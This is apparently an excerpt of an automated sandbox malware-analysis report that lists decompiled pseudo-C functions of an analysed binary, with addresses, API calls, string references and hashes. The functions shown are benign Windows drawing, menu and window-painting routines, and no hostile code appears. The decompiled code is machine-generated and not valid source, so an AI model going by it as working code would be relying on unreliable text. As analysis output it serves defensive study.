								E00CB9B84(_t76, _t104 - 0x2c, CreateCompatibleDC(0));
								_t94 = SelectObject( *(_t104 - 0x28),  *(_t104 - 0x14));
								BitBlt( *(_t104 - 0x28), 0, 0,  *(_t104 - 0x50),  *(_t104 - 0x18),  *(_t104 - 0x38), 0, 0, 0xcc0020);
								if(_t94 != 0) {
									SelectObject( *(_t104 - 0x28), _t94);
								}
								SelectObject( *(_t104 - 0x38), _t76);
								_t83 =  *(_t104 + 0xc);
								_t91 =  *(_t104 - 0x10);
								if(_t83 != 0xffffffff) {
									_t99 = ((_t83 & 0x000000ff) << 0x00000008 | (_t83 & 0x0000ffff) >> 0x00000008) << 0x00000008 | _t83 >> 0x00000010 & 0x000000ff;
									if(_t103 != 0) {
										do {
											asm("sbb ecx, ecx");
											 *_t91 =  ~( *_t91 - _t99) & ( *_t91 | 0xff000000);
											_t91 =  &(_t91[1]);
											_t103 = _t103 - 1;
										} while (_t103 != 0);
									}
								} else {
									if(_t103 != 0) {
										do {
											 *_t91 =  *_t91 | 0xff000000;
											_t91 =  &(_t91[1]);
											_t103 = _t103 - 1;
										} while (_t103 != 0);
									}
								}
								E00CB91A4(_t104 - 0x2c);
							}
							E00CB91A4(_t104 - 0x3c);
							_t75 =  *(_t104 - 0x14);
						} else {
							E00DDF660( *(_t104 - 0x10),  *((intOrPtr*)(_t104 - 0x40)), _t103 << 2);
						}
					}
					_t43 = _t75;
				}
				return E00DDD4FA(_t43);
			}

0x00d0a3df
0x00d0a3df
0x00d0a3e6
0x00d0a3eb
0x00d0a3f0
0x00d0a56e
0x00d0a415
0x00d0a41b
0x00d0a41f
0x00d0a429
0x00d0a432
0x00d0a435
0x00d0a438
0x00d0a43d
0x00d0a443
0x00d0a44c
0x00d0a454
0x00d0a472
0x00d0a477
0x00d0a487
0x00d0a496
0x00d0a49a
0x00d0a4a3
0x00d0a4aa
0x00d0a4b8
0x00d0a4ce
0x00d0a4e2
0x00d0a4ea
0x00d0a4f0
0x00d0a4f0
0x00d0a4fa
0x00d0a500
0x00d0a503
0x00d0a509
0x00d0a536
0x00d0a53a
0x00d0a53c
0x00d0a549
0x00d0a54d
0x00d0a54f
0x00d0a552
0x00d0a552
0x00d0a53c
0x00d0a50b
0x00d0a50d
0x00d0a50f
0x00d0a50f
0x00d0a515
0x00d0a518
0x00d0a518
0x00d0a51d
0x00d0a50d
0x00d0a55a
0x00d0a55a
0x00d0a562
0x00d0a567
0x00d0a456
0x00d0a462
0x00d0a467
0x00d0a454
0x00d0a56a
0x00d0a56a
0x00d0a575

APIs

__EH_prolog3.LIBCMT ref: 00D0A3E6
GetObjectA.GDI32(?,00000018,00E88488), ref: 00D0A3FD

Part of subcall function 00D0A33C: CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 00D0A3B3

CreateCompatibleDC.GDI32(00000000), ref: 00D0A47D
SelectObject.GDI32(00484848,?), ref: 00D0A490
CreateCompatibleDC.GDI32(00000000), ref: 00D0A4AE
SelectObject.GDI32(-00003F01,?), ref: 00D0A4C3
BitBlt.GDI32(-00003F01,00000000,00000000,00000000,?,00484848,00000000,00000000,00CC0020), ref: 00D0A4E2
SelectObject.GDI32(-00003F01,00000000), ref: 00D0A4F0
SelectObject.GDI32(00484848,00000000), ref: 00D0A4FA

Strings

, xrefs: 00D0A44F

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Object$Select$Create$Compatible$H_prolog3Section
String ID:
API String ID: 2431383920-3916222277
Opcode ID: 23cd5c9807b58506a63fd53d5256e98fb8ead78894e3dd510356b3375210d036
Instruction ID: 30026667a25fa3da5564126cf6c79ce75aa85260e86c9aa575cc73e5ac36a045
Opcode Fuzzy Hash: 23cd5c9807b58506a63fd53d5256e98fb8ead78894e3dd510356b3375210d036
Instruction Fuzzy Hash: F1415972D00219AFDB15EFA8DC49AEEBB75FF48710F048129F915B62A0DB308948DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00D52D7A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00D52D7A(void* __ecx, struct tagRECT* _a4, intOrPtr* _a8) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v44;
				char _v64;
				struct tagPOINT _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t38;
				struct HMONITOR__* _t40;
				struct tagMONITORINFO* _t61;
				long _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				int _t77;
				int _t78;
				int _t79;
				int _t80;
				struct tagRECT* _t81;
				intOrPtr* _t82;
				signed int _t83;

				_t38 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t38 ^ _t83;
				_t82 = _a8;
				_t81 = _a4;
				_v72.x = 0;
				_v72.y = 0;
				if( *((intOrPtr*)(__ecx + 8)) == 0) {
					_t61 = _t81->left;
					_t40 = _t81->top;
					_v72.x = _t61;
					_v72.y = _t40;
				} else {
					GetCursorPos( &_v72);
					_t40 = _v72.y;
					_t61 = _v72.x;
				}
				_v24.left = 0;
				_v24.top = 0;
				_v24.right = 0;
				_v24.bottom = 0;
				_v64 = 0x28;
				__imp__MonitorFromPoint(_t40, 2,  &_v64);
				if(GetMonitorInfoA(_t40, _t61) == 0) {
					SystemParametersInfoA(0x30, 0,  &_v24, 0);
				} else {
					CopyRect( &_v24,  &_v44);
				}
				if(_t82 == 0) {
					_t77 = 0;
				} else {
					_t77 =  *_t82;
				}
				_t62 = _v24.left;
				if(_t81->right <= _t62 + _t77) {
					OffsetRect(_t81, _t62 - _t81->right + _t77, 0);
				}
				if(_t82 == 0) {
					_t78 = 0;
				} else {
					_t78 =  *((intOrPtr*)(_t82 + 8));
				}
				_t63 = _v24.right;
				if(_t81->left >= _t63 - _t78) {
					OffsetRect(_t81, _t63 - _t81->left - _t78, 0);
				}
				if(_t82 == 0) {
					_t79 = 0;
				} else {
					_t79 =  *((intOrPtr*)(_t82 + 0xc));
				}
				_t64 = _v24.bottom;
				if(_t81->top >= _t64 - _t79) {
					OffsetRect(_t81, 0, _t64 - _t81->top - _t79);
				}
				if(_t82 == 0) {
					_t80 = 0;
				} else {
					_t80 =  *((intOrPtr*)(_t82 + 4));
				}
				_t65 = _v24.top;
				_t49 = _t65 + _t80;
				if(_t81->bottom < _t65 + _t80) {
					_t49 = OffsetRect(_t81, 0, _t65 - _t81->bottom + _t80);
				}
				return E00DDCBCE(_t49, 0, _v8 ^ _t83, _t80, _t81, _t82);
			}

0x00d52d80
0x00d52d87
0x00d52d8e
0x00d52d92
0x00d52d95
0x00d52d98
0x00d52d9e
0x00d52db2
0x00d52db4
0x00d52db7
0x00d52dba
0x00d52da0
0x00d52da4
0x00d52daa
0x00d52dad
0x00d52dad
0x00d52dc0
0x00d52dc8
0x00d52dcb
0x00d52dce
0x00d52dd1
0x00d52dd8
0x00d52de7
0x00d52e01
0x00d52de9
0x00d52df1
0x00d52df1
0x00d52e09
0x00d52e0f
0x00d52e0b
0x00d52e0b
0x00d52e0b
0x00d52e11
0x00d52e1a
0x00d52e24
0x00d52e24
0x00d52e2c
0x00d52e33
0x00d52e2e
0x00d52e2e
0x00d52e2e
0x00d52e35
0x00d52e3e
0x00d52e47
0x00d52e47
0x00d52e4f
0x00d52e56
0x00d52e51
0x00d52e51
0x00d52e51
0x00d52e58
0x00d52e62
0x00d52e6c
0x00d52e6c
0x00d52e74
0x00d52e7b
0x00d52e76
0x00d52e76
0x00d52e76
0x00d52e7d
0x00d52e80
0x00d52e86
0x00d52e90
0x00d52e90
0x00d52ea4

APIs

GetCursorPos.USER32(?), ref: 00D52DA4
MonitorFromPoint.USER32(00E6872C,?,00000002), ref: 00D52DD8
GetMonitorInfoA.USER32 ref: 00D52DDF
CopyRect.USER32 ref: 00D52DF1
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00D52E01
OffsetRect.USER32(?,?,00000000), ref: 00D52E24
OffsetRect.USER32(?,?,00000000), ref: 00D52E47
OffsetRect.USER32(?,00000000,?), ref: 00D52E6C
OffsetRect.USER32(?,00000000,?), ref: 00D52E90

Strings

(, xrefs: 00D52DD1

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Rect$Offset$InfoMonitor$CopyCursorFromParametersPointSystem
String ID: (
API String ID: 4030222242-3887548279
Opcode ID: 45c72dd6a12e66e27ca511a9d4a24ab8075847904e69cab86a5e2b9a3fd01db4
Instruction ID: 06c62f7795a09b0ed0a004f91018206c3077c24abd27c84daac05be8aed29925
Opcode Fuzzy Hash: 45c72dd6a12e66e27ca511a9d4a24ab8075847904e69cab86a5e2b9a3fd01db4
Instruction Fuzzy Hash: C9411F71A01109EFCB18DFA5C9859BEF779FB45741B14C12EEC56A7204DB30AD0ACBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CB245D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 121
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00CB245D(void* __ebx, void* __ecx, void* __edx, long __edi, void* __esi, void* __eflags, intOrPtr __fp0) {
				int _t73;
				void* _t91;
				void* _t92;

				_t100 = __fp0;
				_t89 = __edi;
				_t88 = __edx;
				_push(0x80);
				E00DDD55F(0xe087fa, __ebx, __edi, __esi);
				_t91 = __ecx;
				_t73 = 0;
				if( *((intOrPtr*)(__ecx + 0x7c)) != 0) {
					_t89 = E00CB2A8A(__ecx);
					if(_t89 == 0) {
						_t89 = E00CB280E(__ecx);
						if(_t89 == 0) {
							goto L14;
						} else {
							if( *((intOrPtr*)(_t89 + 4)) != 0) {
								L11:
								E00CB9032(_t92 - 0x8c);
								 *(_t92 - 4) = _t73;
								 *(_t92 - 0x20) = _t73;
								 *(_t92 - 0x1c) = _t73;
								 *(_t92 - 0x18) = _t73;
								 *(_t92 - 0x14) = _t73;
								GetClientRect( *(_t91 + 0x20), _t92 - 0x20);
								E00CB9B84(_t73, _t92 - 0x8c, BeginPaint( *(_t91 + 0x20), _t92 - 0x7c));
								E00CBB2B2(_t89, _t92 - 0x8c, _t92 - 0x20);
								E00CBB25A(_t89);
								_t73 = SendMessageA( *(_t91 + 0x20),  *0xe86ca8, _t73, _t89);
								if(E00CBB4B0(_t89) == 0x8899000c) {
									SendMessageA( *(_t91 + 0x20),  *0xe86cac, 0, _t89);
								}
								E00CB9CE3(_t92 - 0x8c);
								EndPaint( *(_t91 + 0x20), _t92 - 0x7c);
								E00CB91A4(_t92 - 0x8c);
							} else {
								asm("fldz");
								asm("fst dword [ebp-0x2c]");
								 *((intOrPtr*)(_t92 - 0x3c)) = 0;
								 *((intOrPtr*)(_t92 - 0x30)) = __fp0;
								 *((intOrPtr*)(_t92 - 0x38)) = 0x57;
								 *((intOrPtr*)(_t92 - 0x34)) = 3;
								 *((intOrPtr*)(_t92 - 0x28)) = 0;
								 *((intOrPtr*)(_t92 - 0x24)) = 0;
								E00CBB2EE(0, _t89, __edx, _t89, __ecx, __fp0, _t92 - 0x3c);
								if( *((intOrPtr*)(_t89 + 4)) == 0) {
									goto L14;
								} else {
									goto L11;
								}
							}
						}
					} else {
						if( *((intOrPtr*)(_t89 + 4)) != 0) {
							L4:
							E00CBB25A(_t89);
							_t73 = SendMessageA( *(_t91 + 0x20),  *0xe86ca8, _t73, _t89);
							if(E00CBB4B0(_t89) == 0x8899000c) {
								E00CBB5C4(_t89, _t88, _t89, _t91, _t100,  *(_t91 + 0x20));
								SendMessageA( *(_t91 + 0x20),  *0xe86cac, 0, _t89);
							}
							if(_t73 == 0) {
								goto L14;
							} else {
								ValidateRect( *(_t91 + 0x20), 0);
							}
						} else {
							E00CBB375(0, _t89, __edx, _t89, __ecx, __fp0,  *((intOrPtr*)(__ecx + 0x20)));
							if( *((intOrPtr*)(_t89 + 4)) == 0) {
								goto L14;
							} else {
								goto L4;
							}
						}
					}
				}
				return E00DDD50E(_t73, _t89, _t91);
			}

0x00cb245d
0x00cb245d
0x00cb245d
0x00cb245d
0x00cb2467
0x00cb246c
0x00cb246e
0x00cb2473
0x00cb247e
0x00cb2482
0x00cb2502
0x00cb2506
0x00000000
0x00cb250c
0x00cb250f
0x00cb2544
0x00cb254a
0x00cb2552
0x00cb2559
0x00cb255c
0x00cb255f
0x00cb2562
0x00cb2565
0x00cb257f
0x00cb2591
0x00cb2598
0x00cb25b0
0x00cb25bc
0x00cb25ca
0x00cb25ca
0x00cb25d6
0x00cb25e2
0x00cb25ee
0x00cb2511
0x00cb2511
0x00cb2516
0x00cb251c
0x00cb251f
0x00cb2522
0x00cb2529
0x00cb2530
0x00cb2533
0x00cb2536
0x00cb253e
0x00000000
0x00000000
0x00000000
0x00000000
0x00cb253e
0x00cb250f
0x00cb2484
0x00cb2487
0x00cb249c
0x00cb249e
0x00cb24b6
0x00cb24c2
0x00cb24c9
0x00cb24da
0x00cb24da
0x00cb24e2
0x00000000
0x00cb24e8
0x00cb24ed
0x00cb24f5
0x00cb2489
0x00cb248e
0x00cb2496
0x00000000
0x00000000
0x00000000
0x00000000
0x00cb2496
0x00cb2487
0x00cb2482
0x00cb25fe

APIs

__EH_prolog3_GS.LIBCMT ref: 00CB2467
SendMessageA.USER32(?,00000000,00000000,00000080), ref: 00CB24AE
SendMessageA.USER32(?,00000000,00000000,?), ref: 00CB24DA
ValidateRect.USER32(?,00000000), ref: 00CB24ED

Part of subcall function 00CBB375: GetClientRect.USER32(?,?), ref: 00CBB3DF

GetClientRect.USER32(?,?), ref: 00CB2565
BeginPaint.USER32(?,?), ref: 00CB2572
SendMessageA.USER32(?,00000000,00000000,?), ref: 00CB25A8
SendMessageA.USER32(?,00000000,00000000), ref: 00CB25CA
EndPaint.USER32(?,?), ref: 00CB25E2

Strings

W, xrefs: 00CB2522

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: MessageSend$Rect$ClientPaint$BeginH_prolog3_Validate
String ID: W
API String ID: 3883544035-655174618
Opcode ID: 3ed5f64b7899c66f8ba608d0423640ca70a1fffa35a4b9c46976512aeed58d9a
Instruction ID: 2d67ace58ee88a30d831172b898fe58958bda50aede7c5c408e61b2ac7dd5bbf
Opcode Fuzzy Hash: 3ed5f64b7899c66f8ba608d0423640ca70a1fffa35a4b9c46976512aeed58d9a
Instruction Fuzzy Hash: D6414E71900605EFCF31AFA5DC95AEEBAB5FF88301F10802AF196A2261DB759D54EF10

Uniqueness

Uniqueness Score: -1.00%

Function 00CBAFE4 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 102
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00CBAFE4(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t46;
				int _t48;
				intOrPtr _t58;
				int _t60;
				void* _t65;
				intOrPtr _t75;
				void* _t88;
				int _t90;
				intOrPtr _t93;
				intOrPtr _t94;
				void* _t98;

				_t88 = __edx;
				_push(0x58);
				E00DDD52C(0xe08c3f, __ebx, __edi, __esi);
				_t93 = __ecx;
				 *((intOrPtr*)(_t98 - 0x18)) = __ecx;
				_t75 =  *((intOrPtr*)(_t98 + 8));
				_t46 =  *((intOrPtr*)(_t75 + 0x14));
				if(_t46 == 0) {
					_t8 = GetSystemMetrics(0x32) + 2; // 0x2
					_t90 = _t8;
					_t48 = GetSystemMetrics(0x31);
				} else {
					GetObjectA( *(_t46 + 4), 0x18, _t98 - 0x34);
					_t48 =  *(_t98 - 0x30);
					_t90 =  *((intOrPtr*)(_t98 - 0x2c)) + 2;
				}
				 *((intOrPtr*)(_t98 - 0x10)) = _t48 + 2;
				E00CA67E1(_t98 - 0x14);
				 *(_t98 - 4) =  *(_t98 - 4) & 0x00000000;
				E00DDFBE0(_t90, _t98 - 0x64, 0, 0x30);
				 *(_t98 - 0x64) = 0x30;
				 *((intOrPtr*)(_t98 - 0x60)) = 0x40;
				if(GetMenuItemInfoA( *(_t93 + 4),  *(_t75 + 8), 0, _t98 - 0x64) == 0) {
					L6:
					_t94 =  *((intOrPtr*)(_t98 - 0x10));
				} else {
					_t58 = E00CA2BCE(_t75, _t98 - 0x14, _t93,  *((intOrPtr*)(_t98 - 0x3c)));
					 *((intOrPtr*)(_t98 - 0x3c)) =  *((intOrPtr*)(_t98 - 0x3c)) + 1;
					 *((intOrPtr*)(_t98 - 0x40)) = _t58;
					_t60 = GetMenuItemInfoA( *(_t93 + 4),  *(_t75 + 8), 0, _t98 - 0x64);
					_t95 = _t60;
					E00CA67F5(_t98 - 0x14, 0xffffffff);
					_t104 = _t60;
					if(_t60 == 0) {
						goto L6;
					} else {
						_push(0);
						E00CB90E5(_t75, _t98 - 0x30, _t88, _t90, _t95, _t104);
						 *(_t98 - 4) = 1;
						_t65 = E00CBA2B8(_t98 - 0x30,  *((intOrPtr*)(_t98 - 0x18)) + 8);
						E00CBAFB7(_t98 - 0x30, _t98 - 0x1c, _t98 - 0x14);
						E00CBA2B8(_t98 - 0x30, _t65);
						_t94 =  *((intOrPtr*)(_t98 - 0x10)) +  *((intOrPtr*)(_t98 - 0x1c)) + 3;
						E00CB9360(_t98 - 0x30);
					}
				}
				if(GetSystemMetrics(0xf) > _t90) {
					_t90 = GetSystemMetrics(0xf);
				}
				 *((intOrPtr*)(_t75 + 0x10)) = _t90;
				 *((intOrPtr*)(_t75 + 0xc)) = _t94;
				return E00DDD4FA(E00CA2975(_t55,  *((intOrPtr*)(_t98 - 0x14)) - 0x10));
			}

0x00cbafe4
0x00cbafe4
0x00cbafeb
0x00cbaff0
0x00cbaff2
0x00cbaff5
0x00cbaff8
0x00cbaffd
0x00cbb023
0x00cbb023
0x00cbb026
0x00cbafff
0x00cbb008
0x00cbb011
0x00cbb014
0x00cbb014
0x00cbb032
0x00cbb035
0x00cbb03a
0x00cbb046
0x00cbb04e
0x00cbb058
0x00cbb070
0x00cbb0f6
0x00cbb0f6
0x00cbb076
0x00cbb07c
0x00cbb081
0x00cbb084
0x00cbb093
0x00cbb09e
0x00cbb0a0
0x00cbb0a5
0x00cbb0a7
0x00000000
0x00cbb0a9
0x00cbb0a9
0x00cbb0ae
0x00cbb0bc
0x00cbb0c1
0x00cbb0d3
0x00cbb0dc
0x00cbb0ed
0x00cbb0ef
0x00cbb0ef
0x00cbb0a7
0x00cbb103
0x00cbb10d
0x00cbb10d
0x00cbb112
0x00cbb115
0x00cbb125

APIs

__EH_prolog3.LIBCMT ref: 00CBAFEB
GetObjectA.GDI32(?,00000018,?), ref: 00CBB008
GetSystemMetrics.USER32 ref: 00CBB01B
GetSystemMetrics.USER32 ref: 00CBB026
GetMenuItemInfoA.USER32 ref: 00CBB068
GetMenuItemInfoA.USER32 ref: 00CBB093
GetSystemMetrics.USER32 ref: 00CBB0FB
GetSystemMetrics.USER32 ref: 00CBB107

Strings

@, xrefs: 00CBB058
0, xrefs: 00CBB04E

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: MetricsSystem$InfoItemMenu$H_prolog3Object
String ID: 0$@
API String ID: 414968830-1545510068
Opcode ID: d8d8f41b8eddca1295829e8e4a00453220649e9a40aec16c34548e4d0cce1c2c
Instruction ID: d3fca54634667981e1e1abb2439b54a6acfc9c16108eabf959f5482312417453
Opcode Fuzzy Hash: d8d8f41b8eddca1295829e8e4a00453220649e9a40aec16c34548e4d0cce1c2c
Instruction Fuzzy Hash: 2B4137B1910219AFDF10EFA4DD46BEEB7B9EF04700F144115F916BB291DB70AA08DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00CBB4D7 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E00CBB4D7(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				void* __ebx;
				void* _t14;
				struct HINSTANCE__* _t15;
				struct HINSTANCE__* _t18;
				intOrPtr _t19;
				intOrPtr _t30;
				signed int* _t32;
				intOrPtr* _t35;
				void* _t39;
				intOrPtr* _t41;
				intOrPtr* _t43;
				void* _t44;

				_t34 = __ecx;
				_t44 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x1c)) == 0) {
					_t30 = 1;
					if( *((intOrPtr*)(__ecx + 0x20)) != 0) {
						L5:
						_t15 = E00CB1C03(_t30, _t34, _t39, L"D2D1.dll");
						 *(_t44 + 4) = _t15;
						_pop(_t35);
						if(_t15 != 0) {
							_t41 = GetProcAddress(_t15, "D2D1CreateFactory");
							if(_t41 == 0) {
								L11:
								 *((intOrPtr*)(_t44 + 0x18)) = GetProcAddress( *(_t44 + 4), "D2D1MakeRotateMatrix");
								_t18 = E00CB1C03(_t30, _t35, _t39, L"DWrite.dll");
								 *(_t44 + 8) = _t18;
								if(_t18 != 0) {
									_t43 = GetProcAddress(_t18, "DWriteCreateFactory");
									if(_t43 != 0) {
										_t10 = _t44 + 0x10; // 0x10
										 *0xe17a64(_a8, 0xe19b38, _t10);
										 *_t43();
									}
								}
								_t12 = _t44 + 0x14; // 0x14
								__imp__CoCreateInstance(0xe19aa0, 0, _t30, 0xe3eecc, _t12);
								 *((intOrPtr*)(_t44 + 0x1c)) = _t30;
								_t19 = _t30;
								L15:
								L16:
								return _t19;
							}
							_t5 = _t44 + 0xc; // 0xc
							_t32 = _t5;
							_t35 = _t41;
							 *0xe17a64(_a4, 0xe19b28, 0, _t32);
							if( *_t41() >= 0) {
								_t30 = 1;
								goto L11;
							}
							 *_t32 =  *_t32 & 0x00000000;
							_t19 = 0;
							goto L15;
						}
						L6:
						_t19 = 0;
						goto L16;
					}
					__imp__CoInitialize(0);
					if(_t14 < 0) {
						goto L6;
					}
					 *((intOrPtr*)(__ecx + 0x20)) = 1;
					goto L5;
				}
				return 1;
			}

0x00cbb4d7
0x00cbb4db
0x00cbb4e1
0x00cbb4ee
0x00cbb4f3
0x00cbb504
0x00cbb509
0x00cbb50e
0x00cbb511
0x00cbb514
0x00cbb52a
0x00cbb52e
0x00cbb556
0x00cbb569
0x00cbb56c
0x00cbb571
0x00cbb577
0x00cbb585
0x00cbb589
0x00cbb58b
0x00cbb599
0x00cbb59f
0x00cbb59f
0x00cbb589
0x00cbb5a1
0x00cbb5b2
0x00cbb5b8
0x00cbb5bb
0x00cbb5bd
0x00cbb5be
0x00000000
0x00cbb5be
0x00cbb530
0x00cbb530
0x00cbb533
0x00cbb540
0x00cbb54a
0x00cbb555
0x00000000
0x00cbb555
0x00cbb54c
0x00cbb54f
0x00000000
0x00cbb54f
0x00cbb516
0x00cbb516
0x00000000
0x00cbb516
0x00cbb4f7
0x00cbb4ff
0x00000000
0x00000000
0x00cbb501
0x00000000
0x00cbb501
0x00000000

APIs

CoInitialize.OLE32(00000000), ref: 00CBB4F7

Strings

D2D1MakeRotateMatrix, xrefs: 00CBB556
DWrite.dll, xrefs: 00CBB564
D2D1CreateFactory, xrefs: 00CBB51E
D2D1.dll, xrefs: 00CBB504
DWriteCreateFactory, xrefs: 00CBB579

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Initialize
String ID: D2D1.dll$D2D1CreateFactory$D2D1MakeRotateMatrix$DWrite.dll$DWriteCreateFactory
API String ID: 2538663250-1403614551
Opcode ID: 6bb28be065d49fa3bc551d80be8ec57703fcd5b03a8768365a577bdfd90ba267
Instruction ID: c5be938321076ee4d5aae7d3474520309445f1a1309657e09d1f882c5e466bc6
Opcode Fuzzy Hash: 6bb28be065d49fa3bc551d80be8ec57703fcd5b03a8768365a577bdfd90ba267
Instruction Fuzzy Hash: FF21E071248701AFD3305F62DC99FE77BA9EB40B05F008529F467E2590DBB0EE488B22

Uniqueness

Uniqueness Score: -1.00%

Function 00CCEB01 Relevance: 16.9, APIs: 11, Instructions: 429
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00CCEB01(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				RECT* _t191;
				intOrPtr _t195;
				struct tagRECT _t202;
				intOrPtr _t208;
				intOrPtr _t213;
				intOrPtr _t234;
				struct HDC__* _t240;
				struct HDC__* _t244;
				intOrPtr _t250;
				intOrPtr _t252;
				struct tagRECT _t257;
				intOrPtr _t258;
				intOrPtr _t271;
				struct tagRECT _t282;
				intOrPtr _t283;
				intOrPtr* _t291;
				intOrPtr* _t292;
				intOrPtr _t299;
				signed int _t312;
				void* _t323;
				void* _t325;
				intOrPtr _t326;
				void* _t332;
				struct tagRECT _t337;
				intOrPtr* _t339;
				void* _t342;
				void* _t346;
				intOrPtr _t347;
				void* _t351;
				intOrPtr _t355;
				intOrPtr _t366;
				intOrPtr _t368;
				void* _t369;
				struct tagRECT _t377;
				void* _t378;
				void* _t379;

				_push(0x84);
				E00DDD55F(0xe09c78, __ebx, __edi, __esi);
				_t339 = __ecx;
				 *((intOrPtr*)(_t378 - 0x58)) = __ecx;
				_t291 =  *((intOrPtr*)(_t378 + 0xc));
				_t357 =  *((intOrPtr*)(_t378 + 8));
				 *((intOrPtr*)(_t378 - 0x54)) = _t357;
				 *((intOrPtr*)(_t378 - 0x5c)) = _t291;
				_t191 = _t291 + 0x30;
				 *(_t378 - 0x88) = _t191;
				if(IsRectEmpty(_t191) != 0) {
					L70:
					if( *((intOrPtr*)(_t291 + 0x60)) != 0 ||  *((intOrPtr*)(_t339 + 0x304)) != 0) {
						_t292 =  *((intOrPtr*)(_t291 + 0xd0));
						while(_t292 != 0) {
							_t292 =  *_t292;
							_t357 =  *((intOrPtr*)( *_t339 + 0x190));
							 *0xe17a64( *((intOrPtr*)(_t378 - 0x54)),  *((intOrPtr*)(_t292 + 8)));
							_t195 =  *( *((intOrPtr*)( *_t339 + 0x190)))();
							__eflags = _t195;
							if(_t195 == 0) {
								L77:
								goto L76;
							}
						}
						goto L75;
					} else {
						L75:
						L76:
